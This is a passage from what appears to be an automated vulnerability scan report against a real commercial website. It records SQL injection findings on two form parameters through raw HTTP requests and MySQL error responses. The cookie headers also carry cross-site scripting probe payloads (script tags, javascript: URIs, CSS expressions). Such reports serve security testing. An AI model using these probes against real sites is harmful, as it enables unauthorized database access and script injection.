Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n9dluie1etbfkdp9duct1j8va1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.215. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_388 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_388 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_388 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000'&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gmdbi5ei3tlu1r4is865iudal1; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than 2 months&attributeId_391=1919__This is the first time&attributeId_392=1924_' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000''&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jf7njj6beef8l460ib8k8v7n74; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.216. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_389 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_389 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_389 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1'&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=umns82jml3tvit1bo9pm7o90k6; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than 2 months&attributeId_391=1919__This is the first time&attributeId_392=1924_' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1''&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
